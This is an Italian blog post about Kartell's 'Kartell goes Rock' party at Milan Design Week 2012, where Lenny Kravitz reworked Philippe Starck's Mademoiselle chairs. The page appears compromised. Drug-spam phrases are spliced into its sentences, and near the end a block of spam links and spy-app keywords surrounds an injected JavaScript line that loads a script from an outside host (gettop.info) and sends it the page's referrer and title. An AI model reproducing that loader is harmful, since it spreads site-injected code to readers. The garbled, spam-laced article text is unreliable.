Il party rock di Kartell con Lenny Kravitz e Philippe Starck

Il party rock di Kartell con Lenny Kravitz e Philippe Starck

Kartell presenta in occasione della Milano Design Week 2012 una nuova e straordinaria partnership con Lenny Kravitz, celebrata con un party dall’evocativo nome moduretic tem generico cheap pills “Kartell goes Rock” che ha visto protagonisti la rock star Lenny Kravitz e Philippe Starck. Delirio di folla all’evento (Blogosfere Design & Style era presente) e nel post trovate la nostra ricca fotogallery.

La rock-icon Lenny Kravitz, insieme al suo design team, ha creato, infatti, in esclusiva per Kartell, una collezione di sei poltroncine Mademoiselle (del designer Philippe Starck) reinterpretate e rivestite di materiali scelti di comune accordo con Starck. Una combinazione di pitone, pelliccia, azuvladinenoprescription cuoio e trame intrecciate.

Purchase can you buy strattera over the counter Cheap

“Philippe Starck ha rappresentato un incredibile supporto per la mia avventura nel design, e quando mi ha chiesto di reinterpretare la sua Mademoiselle per Kartell ero raggiante all’idea che due icone collaborassero insieme per un progetto del genere. La

Mademoiselle concepita dalla Kravitz Design A? il risultato dell’incontro fra rock e haute couture”, ha dichiarato Lenny Kravitz.

“Un ambiente A? fatto di materia; legno, ferro, metallo, ma A? anche fatto di antabuse online elementi immateriali, come luce, temperatura, memorie e anche musica e suoni. Lenny ha raggiunto la vetta nell’universo musicale. Per lui A? giunta l’ora di trasformare la magia della sua musica in materia, in sedie o in lampade..” ha spiegato Philippe Starck.

 

Stefania Sorrentino

shatavari purchase purchase levothroid vs levothyroxine http://acashop.top/2018/03/19/how-much-ginette-35/ http://bgcustom.com/lasuna-over-the-counter/ Cheap bevispas dosage s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; android spy, webwatcher, mobile spy app

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>